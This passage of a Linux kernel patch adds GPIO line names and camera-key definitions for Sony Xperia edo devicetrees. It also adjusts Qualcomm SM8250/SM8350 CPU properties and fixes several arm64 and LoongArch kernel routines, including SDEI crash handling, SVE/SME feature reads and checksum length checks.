++			  "NC",
++			  "NC",
++			  "USB_CC_DIR",
++			  "DISP_VSYNC",
++			  "NC",
++			  "NC",
++			  "CAM_PWR_B_CS",
++			  "NC", /* GPIO_70 */
++			  "CAM_PWR_A_CS",
++			  "SBU_SW_SEL",
++			  "SBU_SW_OE",
++			  "FP_RESET_N",
++			  "FP_RESET_N",
++			  "DISP_RESET_N",
++			  "DEBUG_GPIO0",
++			  "TRAY_DET",
++			  "CAM2_RST_N",
++			  "PCIE0_RST_N",
++			  "PCIE0_CLK_REQ_N", /* GPIO_80 */
++			  "PCIE0_WAKE_N",
++			  "DVDT_ENABLE",
++			  "DVDT_WRT_DET_OR",
++			  "NC",
++			  "PCIE2_RST_N",
++			  "PCIE2_CLK_REQ_N",
++			  "PCIE2_WAKE_N",
++			  "MDM_VFR_IRQ0",
++			  "MDM_VFR_IRQ1",
++			  "SW_SERVICE", /* GPIO_90 */
++			  "CAM_SOF",
++			  "CAM1_RST_N",
++			  "CAM0_RST_N",
++			  "CAM0_MCLK",
++			  "CAM1_MCLK",
++			  "CAM2_MCLK",
++			  "CAM3_MCLK",
++			  "CAM4_MCLK",
++			  "TOF_RST_N",
++			  "NC", /* GPIO_100 */
++			  "CCI0_I2C_SDA",
++			  "CCI0_I2C_SCL",
++			  "CCI1_I2C_SDA",
++			  "CCI1_I2C_SCL_",
++			  "CCI2_I2C_SDA",
++			  "CCI2_I2C_SCL",
++			  "CCI3_I2C_SDA",
++			  "CCI3_I2C_SCL",
++			  "CAM3_RST_N",
++			  "NFC_DWL_REQ", /* GPIO_110 */
++			  "NFC_IRQ",
++			  "XVS",
++			  "NC",
++			  "RF_ID_EXTENSION",
++			  "SPK_AMP_I2C_SDA",
++			  "SPK_AMP_I2C_SCL",
++			  "NC",
++			  "NC",
++			  "WLC_I2C_SDA",
++			  "WLC_I2C_SCL", /* GPIO_120 */
++			  "ACC_COVER_OPEN",
++			  "ALS_PROX_INT_N",
++			  "ACCEL_INT",
++			  "WLAN_SW_CTRL",
++			  "CAMSENSOR_I2C_SDA",
++			  "CAMSENSOR_I2C_SCL",
++			  "UDON_SWITCH_SEL",
++			  "WDOG_DISABLE",
++			  "BAROMETER_INT",
++			  "NC", /* GPIO_130 */
++			  "NC",
++			  "FORCED_USB_BOOT",
++			  "NC",
++			  "NC",
++			  "WLC_INT_N",
++			  "NC",
++			  "NC",
++			  "RGBC_IR_INT",
++			  "NC",
++			  "NC", /* GPIO_140 */
++			  "NC",
++			  "BT_SLIMBUS_CLK",
++			  "BT_SLIMBUS_DATA",
++			  "HW_ID_0",
++			  "HW_ID_1",
++			  "WCD_SWR_TX_CLK",
++			  "WCD_SWR_TX_DATA0",
++			  "WCD_SWR_TX_DATA1",
++			  "WCD_SWR_RX_CLK",
++			  "WCD_SWR_RX_DATA0", /* GPIO_150 */
++			  "WCD_SWR_RX_DATA1",
++			  "SDM_DMIC_CLK1",
++			  "SDM_DMIC_DATA1",
++			  "SDM_DMIC_CLK2",
++			  "SDM_DMIC_DATA2",
++			  "SPK_AMP_I2S_CLK",
++			  "SPK_AMP_I2S_WS",
++			  "SPK_AMP_I2S_ASP_DIN",
++			  "SPK_AMP_I2S_ASP_DOUT",
++			  "COMPASS_I2C_SDA", /* GPIO_160 */
++			  "COMPASS_I2C_SCL",
++			  "NC",
++			  "NC",
++			  "SSC_SPI_1_MISO",
++			  "SSC_SPI_1_MOSI",
++			  "SSC_SPI_1_CLK",
++			  "SSC_SPI_1_CS_N",
++			  "NC",
++			  "NC",
++			  "SSC_SENSOR_I2C_SDA", /* GPIO_170 */
++			  "SSC_SENSOR_I2C_SCL",
++			  "NC",
++			  "NC",
++			  "NC",
++			  "NC",
++			  "HST_BLE_SNS_UART6_TX",
++			  "HST_BLE_SNS_UART6_RX",
++			  "HST_WLAN_UART_TX",
++			  "HST_WLAN_UART_RX";
++};
+diff --git a/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo-pdx206.dts b/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo-pdx206.dts
+index 5ecf7dafb2ec4..0e50661c1b4c1 100644
+--- a/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo-pdx206.dts
++++ b/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo-pdx206.dts
+@@ -20,6 +20,8 @@
+ };
+ 
+ &gpio_keys {
++	pinctrl-0 = <&focus_n &snapshot_n &vol_down_n &g_assist_n>;
++
+ 	g-assist-key {
+ 		label = "Google Assistant Key";
+ 		linux,code = <KEY_LEFTMETA>;
+@@ -30,6 +32,247 @@
+ 	};
+ };
+ 
++&pm8009_gpios {
++	gpio-line-names = "NC", /* GPIO_1 */
++			  "NC",
++			  "WIDEC_PWR_EN",
++			  "NC";
++};
++
++&pm8150_gpios {
++	gpio-line-names = "VOL_DOWN_N", /* GPIO_1 */
++			  "OPTION_2",
++			  "NC",
++			  "PM_SLP_CLK_IN",
++			  "OPTION_1",
++			  "G_ASSIST_N",
++			  "NC",
++			  "SP_ARI_PWR_ALARM",
++			  "NC",
++			  "NC"; /* GPIO_10 */
++
++	g_assist_n: g-assist-n-state {
++		pins = "gpio6";
++		function = "normal";
++		power-source = <1>;
++		bias-pull-up;
++		input-enable;
++	};
++};
++
++&pm8150b_gpios {
++	gpio-line-names = "SNAPSHOT_N", /* GPIO_1 */
++			  "FOCUS_N",
++			  "NC",
++			  "NC",
++			  "RF_LCD_ID_EN",
++			  "NC",
++			  "NC",
++			  "LCD_ID",
++			  "NC",
++			  "NC", /* GPIO_10 */
++			  "NC",
++			  "RF_ID";
++};
++
++&pm8150l_gpios {
++	gpio-line-names = "NC", /* GPIO_1 */
++			  "PM3003A_EN",
++			  "NC",
++			  "NC",
++			  "NC",
++			  "AUX2_THERM",
++			  "BB_HP_EN",
++			  "FP_LDO_EN",
++			  "PMX_RESET_N",
++			  "NC", /* GPIO_10 */
++			  "NC",
++			  "PM3003A_MODE";
++};
++
++&tlmm {
++	gpio-line-names = "AP_CTI_IN", /* GPIO_0 */
++			  "MDM2AP_ERR_FATAL",
++			  "AP_CTI_OUT",
++			  "MDM2AP_STATUS",
++			  "NFC_I2C_SDA",
++			  "NFC_I2C_SCL",
++			  "NFC_EN",
++			  "NFC_CLK_REQ",
++			  "NFC_ESE_PWR_REQ",
++			  "DVDT_WRT_DET_AND",
++			  "SPK_AMP_RESET_N", /* GPIO_10 */
++			  "SPK_AMP_INT_N",
++			  "APPS_I2C_1_SDA",
++			  "APPS_I2C_1_SCL",
++			  "NC",
++			  "TX_GTR_THRES_IN",
++			  "HST_BT_UART_CTS",
++			  "HST_BT_UART_RFR",
++			  "HST_BT_UART_TX",
++			  "HST_BT_UART_RX",
++			  "HST_WLAN_EN", /* GPIO_20 */
++			  "HST_BT_EN",
++			  "RGBC_IR_PWR_EN",
++			  "FP_INT_N",
++			  "NC",
++			  "NC",
++			  "NC",
++			  "NC",
++			  "NFC_ESE_SPI_MISO",
++			  "NFC_ESE_SPI_MOSI",
++			  "NFC_ESE_SPI_SCLK", /* GPIO_30 */
++			  "NFC_ESE_SPI_CS_N",
++			  "WCD_RST_N",
++			  "NC",
++			  "SDM_DEBUG_UART_TX",
++			  "SDM_DEBUG_UART_RX",
++			  "TS_I2C_SDA",
++			  "TS_I2C_SCL",
++			  "TS_INT_N",
++			  "FP_SPI_MISO", /* GPIO_40 */
++			  "FP_SPI_MOSI",
++			  "FP_SPI_SCLK",
++			  "FP_SPI_CS_N",
++			  "APPS_I2C_0_SDA",
++			  "APPS_I2C_0_SCL",
++			  "DISP_ERR_FG",
++			  "UIM2_DETECT_EN",
++			  "NC",
++			  "NC",
++			  "NC", /* GPIO_50 */
++			  "NC",
++			  "MDM_UART_CTS",
++			  "MDM_UART_RFR",
++			  "MDM_UART_TX",
++			  "MDM_UART_RX",
++			  "AP2MDM_STATUS",
++			  "AP2MDM_ERR_FATAL",
++			  "MDM_IPC_HS_UART_TX",
++			  "MDM_IPC_HS_UART_RX",
++			  "NC", /* GPIO_60 */
++			  "NC",
++			  "NC",
++			  "NC",
++			  "NC",
++			  "USB_CC_DIR",
++			  "DISP_VSYNC",
++			  "NC",
++			  "NC",
++			  "CAM_PWR_B_CS",
++			  "NC", /* GPIO_70 */
++			  "FRONTC_PWR_EN",
++			  "SBU_SW_SEL",
++			  "SBU_SW_OE",
++			  "FP_RESET_N",
++			  "FP_RESET_N",
++			  "DISP_RESET_N",
++			  "DEBUG_GPIO0",
++			  "TRAY_DET",
++			  "CAM2_RST_N",
++			  "PCIE0_RST_N",
++			  "PCIE0_CLK_REQ_N", /* GPIO_80 */
++			  "PCIE0_WAKE_N",
++			  "DVDT_ENABLE",
++			  "DVDT_WRT_DET_OR",
++			  "NC",
++			  "PCIE2_RST_N",
++			  "PCIE2_CLK_REQ_N",
++			  "PCIE2_WAKE_N",
++			  "MDM_VFR_IRQ0",
++			  "MDM_VFR_IRQ1",
++			  "SW_SERVICE", /* GPIO_90 */
++			  "CAM_SOF",
++			  "CAM1_RST_N",
++			  "CAM0_RST_N",
++			  "CAM0_MCLK",
++			  "CAM1_MCLK",
++			  "CAM2_MCLK",
++			  "CAM3_MCLK",
++			  "NC",
++			  "NC",
++			  "NC", /* GPIO_100 */
++			  "CCI0_I2C_SDA",
++			  "CCI0_I2C_SCL",
++			  "CCI1_I2C_SDA",
++			  "CCI1_I2C_SCL_",
++			  "CCI2_I2C_SDA",
++			  "CCI2_I2C_SCL",
++			  "CCI3_I2C_SDA",
++			  "CCI3_I2C_SCL",
++			  "CAM3_RST_N",
++			  "NFC_DWL_REQ", /* GPIO_110 */
++			  "NFC_IRQ",
++			  "XVS",
++			  "NC",
++			  "RF_ID_EXTENSION",
++			  "SPK_AMP_I2C_SDA",
++			  "SPK_AMP_I2C_SCL",
++			  "NC",
++			  "NC",
++			  "NC",
++			  "NC",
++			  "ACC_COVER_OPEN",
++			  "ALS_PROX_INT_N",
++			  "ACCEL_INT",
++			  "WLAN_SW_CTRL",
++			  "CAMSENSOR_I2C_SDA",
++			  "CAMSENSOR_I2C_SCL",
++			  "UDON_SWITCH_SEL",
++			  "WDOG_DISABLE",
++			  "BAROMETER_INT",
++			  "NC", /* GPIO_130 */
++			  "NC",
++			  "FORCED_USB_BOOT",
++			  "NC",
++			  "NC",
++			  "NC",
++			  "NC",
++			  "NC",
++			  "RGBC_IR_INT",
++			  "NC",
++			  "NC", /* GPIO_140 */
++			  "NC",
++			  "BT_SLIMBUS_CLK",
++			  "BT_SLIMBUS_DATA",
++			  "HW_ID_0",
++			  "HW_ID_1",
++			  "WCD_SWR_TX_CLK",
++			  "WCD_SWR_TX_DATA0",
++			  "WCD_SWR_TX_DATA1",
++			  "WCD_SWR_RX_CLK",
++			  "WCD_SWR_RX_DATA0", /* GPIO_150 */
++			  "WCD_SWR_RX_DATA1",
++			  "SDM_DMIC_CLK1",
++			  "SDM_DMIC_DATA1",
++			  "SDM_DMIC_CLK2",
++			  "SDM_DMIC_DATA2",
++			  "SPK_AMP_I2S_CLK",
++			  "SPK_AMP_I2S_WS",
++			  "SPK_AMP_I2S_ASP_DIN",
++			  "SPK_AMP_I2S_ASP_DOUT",
++			  "COMPASS_I2C_SDA", /* GPIO_160 */
++			  "COMPASS_I2C_SCL",
++			  "NC",
++			  "NC",
++			  "SSC_SPI_1_MISO",
++			  "SSC_SPI_1_MOSI",
++			  "SSC_SPI_1_CLK",
++			  "SSC_SPI_1_CS_N",
++			  "NC",
++			  "NC",
++			  "SSC_SENSOR_I2C_SDA", /* GPIO_170 */
++			  "SSC_SENSOR_I2C_SCL",
++			  "NC",
++			  "NC",
++			  "NC",
++			  "NC",
++			  "HST_BLE_SNS_UART6_TX",
++			  "HST_BLE_SNS_UART6_RX",
++			  "HST_WLAN_UART_TX",
++			  "HST_WLAN_UART_RX";
++};
++
+ &vreg_l2f_1p3 {
+ 	regulator-min-microvolt = <1200000>;
+ 	regulator-max-microvolt = <1200000>;
+diff --git a/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo.dtsi b/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo.dtsi
+index 390b90a8ddf70..3b710c6a326a5 100644
+--- a/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo.dtsi
+@@ -51,12 +51,26 @@
+ 	gpio_keys: gpio-keys {
+ 		compatible = "gpio-keys";
+ 
+-		/*
+-		 * Camera focus (light press) and camera snapshot (full press)
+-		 * seem not to work properly.. Adding the former one stalls the CPU
+-		 * and the latter kills the volume down key for whatever reason. In any
+-		 * case, they are both on &pm8150b_gpios: camera focus(2), camera snapshot(1).
+-		 */
++		pinctrl-0 = <&focus_n &snapshot_n &vol_down_n>;
++		pinctrl-names = "default";
++
++		key-camera-focus {
++			label = "Camera Focus";
++			linux,code = <KEY_CAMERA_FOCUS>;
++			gpios = <&pm8150b_gpios 2 GPIO_ACTIVE_LOW>;
++			debounce-interval = <15>;
++			linux,can-disable;
++			wakeup-source;
++		};
++
++		key-camera-snapshot {
++			label = "Camera Snapshot";
++			linux,code = <KEY_CAMERA>;
++			gpios = <&pm8150b_gpios 1 GPIO_ACTIVE_LOW>;
++			debounce-interval = <15>;
++			linux,can-disable;
++			wakeup-source;
++		};
+ 
+ 		key-vol-down {
+ 			label = "Volume Down";
+@@ -546,6 +560,34 @@
+ 	vdda-pll-supply = <&vreg_l9a_1p2>;
+ };
+ 
++&pm8150_gpios {
++	vol_down_n: vol-down-n-state {
++		pins = "gpio1";
++		function = "normal";
++		power-source = <0>;
++		bias-pull-up;
++		input-enable;
++	};
++};
++
++&pm8150b_gpios {
++	snapshot_n: snapshot-n-state {
++		pins = "gpio1";
++		function = "normal";
++		power-source = <0>;
++		bias-pull-up;
++		input-enable;
++	};
++
++	focus_n: focus-n-state {
++		pins = "gpio2";
++		function = "normal";
++		power-source = <0>;
++		bias-pull-up;
++		input-enable;
++	};
++};
++
+ &pon_pwrkey {
+ 	status = "okay";
+ };
+diff --git a/arch/arm64/boot/dts/qcom/sm8250.dtsi b/arch/arm64/boot/dts/qcom/sm8250.dtsi
+index e93955525a107..4d9b30f0b2841 100644
+--- a/arch/arm64/boot/dts/qcom/sm8250.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8250.dtsi
+@@ -99,7 +99,7 @@
+ 			reg = <0x0 0x0>;
+ 			enable-method = "psci";
+ 			capacity-dmips-mhz = <448>;
+-			dynamic-power-coefficient = <205>;
++			dynamic-power-coefficient = <105>;
+ 			next-level-cache = <&L2_0>;
+ 			power-domains = <&CPU_PD0>;
+ 			power-domain-names = "psci";
+@@ -123,7 +123,7 @@
+ 			reg = <0x0 0x100>;
+ 			enable-method = "psci";
+ 			capacity-dmips-mhz = <448>;
+-			dynamic-power-coefficient = <205>;
++			dynamic-power-coefficient = <105>;
+ 			next-level-cache = <&L2_100>;
+ 			power-domains = <&CPU_PD1>;
+ 			power-domain-names = "psci";
+@@ -144,7 +144,7 @@
+ 			reg = <0x0 0x200>;
+ 			enable-method = "psci";
+ 			capacity-dmips-mhz = <448>;
+-			dynamic-power-coefficient = <205>;
++			dynamic-power-coefficient = <105>;
+ 			next-level-cache = <&L2_200>;
+ 			power-domains = <&CPU_PD2>;
+ 			power-domain-names = "psci";
+@@ -165,7 +165,7 @@
+ 			reg = <0x0 0x300>;
+ 			enable-method = "psci";
+ 			capacity-dmips-mhz = <448>;
+-			dynamic-power-coefficient = <205>;
++			dynamic-power-coefficient = <105>;
+ 			next-level-cache = <&L2_300>;
+ 			power-domains = <&CPU_PD3>;
+ 			power-domain-names = "psci";
+@@ -1862,6 +1862,7 @@
+ 
+ 			pinctrl-names = "default";
+ 			pinctrl-0 = <&pcie0_default_state>;
++			dma-coherent;
+ 
+ 			status = "disabled";
+ 		};
+@@ -1968,6 +1969,7 @@
+ 
+ 			pinctrl-names = "default";
+ 			pinctrl-0 = <&pcie1_default_state>;
++			dma-coherent;
+ 
+ 			status = "disabled";
+ 		};
+@@ -2076,6 +2078,7 @@
+ 
+ 			pinctrl-names = "default";
+ 			pinctrl-0 = <&pcie2_default_state>;
++			dma-coherent;
+ 
+ 			status = "disabled";
+ 		};
+diff --git a/arch/arm64/boot/dts/qcom/sm8350.dtsi b/arch/arm64/boot/dts/qcom/sm8350.dtsi
+index 7fd1c3f71c0f8..b3245b13b2611 100644
+--- a/arch/arm64/boot/dts/qcom/sm8350.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8350.dtsi
+@@ -63,7 +63,7 @@
+ 
+ 		CPU0: cpu@0 {
+ 			device_type = "cpu";
+-			compatible = "qcom,kryo685";
++			compatible = "arm,cortex-a55";
+ 			reg = <0x0 0x0>;
+ 			enable-method = "psci";
+ 			next-level-cache = <&L2_0>;
+@@ -82,7 +82,7 @@
+ 
+ 		CPU1: cpu@100 {
+ 			device_type = "cpu";
+-			compatible = "qcom,kryo685";
++			compatible = "arm,cortex-a55";
+ 			reg = <0x0 0x100>;
+ 			enable-method = "psci";
+ 			next-level-cache = <&L2_100>;
+@@ -98,7 +98,7 @@
+ 
+ 		CPU2: cpu@200 {
+ 			device_type = "cpu";
+-			compatible = "qcom,kryo685";
++			compatible = "arm,cortex-a55";
+ 			reg = <0x0 0x200>;
+ 			enable-method = "psci";
+ 			next-level-cache = <&L2_200>;
+@@ -114,7 +114,7 @@
+ 
+ 		CPU3: cpu@300 {
+ 			device_type = "cpu";
+-			compatible = "qcom,kryo685";
++			compatible = "arm,cortex-a55";
+ 			reg = <0x0 0x300>;
+ 			enable-method = "psci";
+ 			next-level-cache = <&L2_300>;
+@@ -130,7 +130,7 @@
+ 
+ 		CPU4: cpu@400 {
+ 			device_type = "cpu";
+-			compatible = "qcom,kryo685";
++			compatible = "arm,cortex-a78";
+ 			reg = <0x0 0x400>;
+ 			enable-method = "psci";
+ 			next-level-cache = <&L2_400>;
+@@ -146,7 +146,7 @@
+ 
+ 		CPU5: cpu@500 {
+ 			device_type = "cpu";
+-			compatible = "qcom,kryo685";
++			compatible = "arm,cortex-a78";
+ 			reg = <0x0 0x500>;
+ 			enable-method = "psci";
+ 			next-level-cache = <&L2_500>;
+@@ -163,7 +163,7 @@
+ 
+ 		CPU6: cpu@600 {
+ 			device_type = "cpu";
+-			compatible = "qcom,kryo685";
++			compatible = "arm,cortex-a78";
+ 			reg = <0x0 0x600>;
+ 			enable-method = "psci";
+ 			next-level-cache = <&L2_600>;
+@@ -179,7 +179,7 @@
+ 
+ 		CPU7: cpu@700 {
+ 			device_type = "cpu";
+-			compatible = "qcom,kryo685";
++			compatible = "arm,cortex-x1";
+ 			reg = <0x0 0x700>;
+ 			enable-method = "psci";
+ 			next-level-cache = <&L2_700>;
+@@ -236,8 +236,8 @@
+ 				compatible = "arm,idle-state";
+ 				idle-state-name = "silver-rail-power-collapse";
+ 				arm,psci-suspend-param = <0x40000004>;
+-				entry-latency-us = <355>;
+-				exit-latency-us = <909>;
++				entry-latency-us = <360>;
++				exit-latency-us = <531>;
+ 				min-residency-us = <3934>;
+ 				local-timer-stop;
+ 			};
+@@ -246,8 +246,8 @@
+ 				compatible = "arm,idle-state";
+ 				idle-state-name = "gold-rail-power-collapse";
+ 				arm,psci-suspend-param = <0x40000004>;
+-				entry-latency-us = <241>;
+-				exit-latency-us = <1461>;
++				entry-latency-us = <702>;
++				exit-latency-us = <1061>;
+ 				min-residency-us = <4488>;
+ 				local-timer-stop;
+ 			};
+@@ -2072,6 +2072,13 @@
+ 			      <0 0x18593000 0 0x1000>;
+ 			reg-names = "freq-domain0", "freq-domain1", "freq-domain2";
+ 
++			interrupts = <GIC_SPI 30 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 31 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 19 IRQ_TYPE_LEVEL_HIGH>;
++			interrupt-names = "dcvsh-irq-0",
++					  "dcvsh-irq-1",
++					  "dcvsh-irq-2";
++
+ 			clocks = <&rpmhcc RPMH_CXO_CLK>, <&gcc GCC_GPLL0>;
+ 			clock-names = "xo", "alternate";
+ 
+diff --git a/arch/arm64/include/asm/sdei.h b/arch/arm64/include/asm/sdei.h
+index 4292d9bafb9d2..484cb6972e99a 100644
+--- a/arch/arm64/include/asm/sdei.h
++++ b/arch/arm64/include/asm/sdei.h
+@@ -17,6 +17,9 @@
+ 
+ #include <asm/virt.h>
+ 
++DECLARE_PER_CPU(struct sdei_registered_event *, sdei_active_normal_event);
++DECLARE_PER_CPU(struct sdei_registered_event *, sdei_active_critical_event);
++
+ extern unsigned long sdei_exit_mode;
+ 
+ /* Software Delegated Exception entry point from firmware*/
+@@ -29,6 +32,9 @@ asmlinkage void __sdei_asm_entry_trampoline(unsigned long event_num,
+ 						   unsigned long pc,
+ 						   unsigned long pstate);
+ 
++/* Abort a running handler. Context is discarded. */
++void __sdei_handler_abort(void);
++
+ /*
+  * The above entry point does the minimum to call C code. This function does
+  * anything else, before calling the driver.
+diff --git a/arch/arm64/kernel/entry.S b/arch/arm64/kernel/entry.S
+index 3671d9521d4f5..beb4db21c89c1 100644
+--- a/arch/arm64/kernel/entry.S
++++ b/arch/arm64/kernel/entry.S
+@@ -993,9 +993,13 @@ SYM_CODE_START(__sdei_asm_handler)
+ 
+ 	mov	x19, x1
+ 
+-#if defined(CONFIG_VMAP_STACK) || defined(CONFIG_SHADOW_CALL_STACK)
++	/* Store the registered-event for crash_smp_send_stop() */
+ 	ldrb	w4, [x19, #SDEI_EVENT_PRIORITY]
+-#endif
++	cbnz	w4, 1f
++	adr_this_cpu dst=x5, sym=sdei_active_normal_event, tmp=x6
++	b	2f
++1:	adr_this_cpu dst=x5, sym=sdei_active_critical_event, tmp=x6
++2:	str	x19, [x5]
+ 
+ #ifdef CONFIG_VMAP_STACK
+ 	/*
+@@ -1062,6 +1066,14 @@ SYM_CODE_START(__sdei_asm_handler)
+ 
+ 	ldr_l	x2, sdei_exit_mode
+ 
++	/* Clear the registered-event seen by crash_smp_send_stop() */
++	ldrb	w3, [x4, #SDEI_EVENT_PRIORITY]
++	cbnz	w3, 1f
++	adr_this_cpu dst=x5, sym=sdei_active_normal_event, tmp=x6
++	b	2f
++1:	adr_this_cpu dst=x5, sym=sdei_active_critical_event, tmp=x6
++2:	str	xzr, [x5]
++
+ alternative_if_not ARM64_UNMAP_KERNEL_AT_EL0
+ 	sdei_handler_exit exit_mode=x2
+ alternative_else_nop_endif
+@@ -1072,4 +1084,15 @@ alternative_else_nop_endif
+ #endif
+ SYM_CODE_END(__sdei_asm_handler)
+ NOKPROBE(__sdei_asm_handler)
++
++SYM_CODE_START(__sdei_handler_abort)
++	mov_q	x0, SDEI_1_0_FN_SDEI_EVENT_COMPLETE_AND_RESUME
++	adr	x1, 1f
++	ldr_l	x2, sdei_exit_mode
++	sdei_handler_exit exit_mode=x2
++	// exit the handler and jump to the next instruction.
++	// Exit will stomp x0-x17, PSTATE, ELR_ELx, and SPSR_ELx.
++1:	ret
++SYM_CODE_END(__sdei_handler_abort)
++NOKPROBE(__sdei_handler_abort)
+ #endif /* CONFIG_ARM_SDE_INTERFACE */
+diff --git a/arch/arm64/kernel/fpsimd.c b/arch/arm64/kernel/fpsimd.c
+index 8cd59d387b90b..8c226d79abdfc 100644
+--- a/arch/arm64/kernel/fpsimd.c
++++ b/arch/arm64/kernel/fpsimd.c
+@@ -1133,9 +1133,6 @@ void sve_kernel_enable(const struct arm64_cpu_capabilities *__always_unused p)
+  */
+ u64 read_zcr_features(void)
+ {
+-	u64 zcr;
+-	unsigned int vq_max;
+-
+ 	/*
+ 	 * Set the maximum possible VL, and write zeroes to all other
+ 	 * bits to see if they stick.
+@@ -1143,12 +1140,8 @@ u64 read_zcr_features(void)
+ 	sve_kernel_enable(NULL);
+ 	write_sysreg_s(ZCR_ELx_LEN_MASK, SYS_ZCR_EL1);
+ 
+-	zcr = read_sysreg_s(SYS_ZCR_EL1);
+-	zcr &= ~(u64)ZCR_ELx_LEN_MASK; /* find sticky 1s outside LEN field */
+-	vq_max = sve_vq_from_vl(sve_get_vl());
+-	zcr |= vq_max - 1; /* set LEN field to maximum effective value */
+-
+-	return zcr;
++	/* Return LEN value that would be written to get the maximum VL */
++	return sve_vq_from_vl(sve_get_vl()) - 1;
+ }
+ 
+ void __init sve_setup(void)
+@@ -1292,11 +1285,7 @@ void fa64_kernel_enable(const struct arm64_cpu_capabilities *__always_unused p)
+  */
+ u64 read_smcr_features(void)
+ {
+-	u64 smcr;
+-	unsigned int vq_max;
+-
+ 	sme_kernel_enable(NULL);
+-	sme_smstart_sm();
+ 
+ 	/*
+ 	 * Set the maximum possible VL.
+@@ -1304,14 +1293,8 @@ u64 read_smcr_features(void)
+ 	write_sysreg_s(read_sysreg_s(SYS_SMCR_EL1) | SMCR_ELx_LEN_MASK,
+ 		       SYS_SMCR_EL1);
+ 
+-	smcr = read_sysreg_s(SYS_SMCR_EL1);
+-	smcr &= ~(u64)SMCR_ELx_LEN_MASK; /* Only the LEN field */
+-	vq_max = sve_vq_from_vl(sve_get_vl());
+-	smcr |= vq_max - 1; /* set LEN field to maximum effective value */
+-
+-	sme_smstop_sm();
+-
+-	return smcr;
++	/* Return LEN value that would be written to get the maximum VL */
++	return sve_vq_from_vl(sme_get_vl()) - 1;
+ }
+ 
+ void __init sme_setup(void)
+diff --git a/arch/arm64/kernel/ptrace.c b/arch/arm64/kernel/ptrace.c
+index f606c942f514e..e1f6366b7ccdf 100644
+--- a/arch/arm64/kernel/ptrace.c
++++ b/arch/arm64/kernel/ptrace.c
+@@ -896,7 +896,8 @@ static int sve_set_common(struct task_struct *target,
+ 			break;
+ 		default:
+ 			WARN_ON_ONCE(1);
+-			return -EINVAL;
++			ret = -EINVAL;
++			goto out;
+ 		}
+ 
+ 		/*
+diff --git a/arch/arm64/kernel/sdei.c b/arch/arm64/kernel/sdei.c
+index d56e170e1ca7c..48c6457b67db8 100644
+--- a/arch/arm64/kernel/sdei.c
++++ b/arch/arm64/kernel/sdei.c
+@@ -47,6 +47,9 @@ DEFINE_PER_CPU(unsigned long *, sdei_shadow_call_stack_normal_ptr);
+ DEFINE_PER_CPU(unsigned long *, sdei_shadow_call_stack_critical_ptr);
+ #endif
+ 
++DEFINE_PER_CPU(struct sdei_registered_event *, sdei_active_normal_event);
++DEFINE_PER_CPU(struct sdei_registered_event *, sdei_active_critical_event);
++
+ static void _free_sdei_stack(unsigned long * __percpu *ptr, int cpu)
+ {
+ 	unsigned long *p;
+diff --git a/arch/arm64/kernel/smp.c b/arch/arm64/kernel/smp.c
+index ffc5d76cf6955..d323621d14a59 100644
+--- a/arch/arm64/kernel/smp.c
++++ b/arch/arm64/kernel/smp.c
+@@ -1047,10 +1047,8 @@ void crash_smp_send_stop(void)
+ 	 * If this cpu is the only one alive at this point in time, online or
+ 	 * not, there are no stop messages to be sent around, so just back out.
+ 	 */
+-	if (num_other_online_cpus() == 0) {
+-		sdei_mask_local_cpu();
+-		return;
+-	}
++	if (num_other_online_cpus() == 0)
++		goto skip_ipi;
+ 
+ 	cpumask_copy(&mask, cpu_online_mask);
+ 	cpumask_clear_cpu(smp_processor_id(), &mask);
+@@ -1069,7 +1067,9 @@ void crash_smp_send_stop(void)
+ 		pr_warn("SMP: failed to stop secondary CPUs %*pbl\n",
+ 			cpumask_pr_args(&mask));
+ 
++skip_ipi:
+ 	sdei_mask_local_cpu();
++	sdei_handler_abort();
+ }
+ 
+ bool smp_crash_stop_failed(void)
+diff --git a/arch/arm64/lib/csum.c b/arch/arm64/lib/csum.c
+index 78b87a64ca0a3..2432683e48a61 100644
+--- a/arch/arm64/lib/csum.c
++++ b/arch/arm64/lib/csum.c
+@@ -24,7 +24,7 @@ unsigned int __no_sanitize_address do_csum(const unsigned char *buff, int len)
+ 	const u64 *ptr;
+ 	u64 data, sum64 = 0;
+ 
+-	if (unlikely(len == 0))
++	if (unlikely(len <= 0))
+ 		return 0;
+ 
+ 	offset = (unsigned long)buff & 7;
+diff --git a/arch/arm64/mm/hugetlbpage.c b/arch/arm64/mm/hugetlbpage.c
+index 35e9a468d13e6..134dcf6bc650c 100644
+--- a/arch/arm64/mm/hugetlbpage.c
++++ b/arch/arm64/mm/hugetlbpage.c
+@@ -236,7 +236,7 @@ static void clear_flush(struct mm_struct *mm,
+ 	unsigned long i, saddr = addr;
+ 
+ 	for (i = 0; i < ncontig; i++, addr += pgsize, ptep++)
+-		pte_clear(mm, addr, ptep);
++		ptep_clear(mm, addr, ptep);
+ 
+ 	flush_tlb_range(&vma, saddr, addr);
+ }
+diff --git a/arch/loongarch/include/asm/loongarch.h b/arch/loongarch/include/asm/loongarch.h
+index 62835d84a647d..3d15fa5bef37d 100644
+--- a/arch/loongarch/include/asm/loongarch.h
++++ b/arch/loongarch/include/asm/loongarch.h
+@@ -1488,7 +1488,7 @@ __BUILD_CSR_OP(tlbidx)
+ #define write_fcsr(dest, val) \
+ do {	\
+ 	__asm__ __volatile__(	\
+-	"	movgr2fcsr	%0, "__stringify(dest)"	\n"	\
++	"	movgr2fcsr	"__stringify(dest)", %0	\n"	\
+ 	: : "r" (val));	\
+ } while (0)
+ 
+diff --git a/arch/loongarch/include/asm/pgtable-bits.h b/arch/loongarch/include/asm/pgtable-bits.h
+index 3d1e0a69975a5..5f2ebcea509cd 100644
+--- a/arch/loongarch/include/asm/pgtable-bits.h
++++ b/arch/loongarch/include/asm/pgtable-bits.h
+@@ -21,12 +21,14 @@
+ #define	_PAGE_HGLOBAL_SHIFT	12 /* HGlobal is a PMD bit */
+ #define	_PAGE_PFN_SHIFT		12
+ #define	_PAGE_PFN_END_SHIFT	48
++#define	_PAGE_PRESENT_INVALID_SHIFT 60
